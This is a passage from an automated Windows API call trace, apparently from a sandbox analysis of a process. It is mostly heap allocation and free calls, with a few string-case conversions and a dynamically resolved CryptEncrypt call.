0x24a9fa8 [0263.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0263.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0263.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0263.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0263.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0263.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0263.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0263.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0263.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0263.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0263.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0263.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0263.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0263.818] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0263.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0263.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0263.819] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0263.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0263.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0263.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0263.819] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0263.819] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0263.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0263.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0263.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0263.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0263.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0263.819] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0263.819] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0263.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0263.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0263.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0263.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0263.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0263.820] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0263.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0263.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0263.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f30 [0263.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0263.820] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0263.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0263.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0263.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0263.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0263.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0263.820] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0263.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0263.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0263.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0263.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0263.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0263.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0263.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0263.821] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0263.821] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0263.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0263.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0263.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0263.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0263.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0263.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0263.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0263.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0263.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0263.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0263.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0263.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0263.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0263.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0263.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0263.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0263.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0263.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0263.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0263.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0263.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0263.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0263.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34c7548 | out: hHeap=0x25c0000) returned 1 [0263.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0263.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0263.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0263.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0263.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0263.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0263.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0263.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0263.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.824] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0263.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0263.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0263.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0263.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0263.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0263.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0263.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0263.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0263.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0263.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0263.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0263.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0263.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0263.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0263.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0263.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0263.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0263.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0263.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0263.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0263.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0263.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0263.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0263.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0263.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0263.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0263.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0263.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0263.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0263.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0263.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0263.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0263.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0263.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24aa1a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0263.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0263.826] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0263.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0263.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0263.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0263.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0263.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0263.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0263.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0263.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0263.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2160 | out: hHeap=0x25c0000) returned 1 [0263.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0263.827] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x152ef, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x152f0) returned 1 [0263.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0263.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0263.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2160 [0263.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0263.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0263.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0263.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0263.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0263.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0263.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0263.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0263.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0263.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0263.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0263.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0263.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0263.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0263.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0263.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0263.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0263.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0263.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0263.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0263.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0263.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0263.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0263.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0263.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0263.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0263.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0263.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0263.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0263.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0263.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0263.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0263.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0263.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0263.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0263.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0263.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0263.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0263.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0263.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0263.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0263.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0263.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0263.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0263.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0263.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0263.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0263.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0263.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0263.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0263.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0263.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0263.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0263.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0263.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0263.830] HeapFree (in: 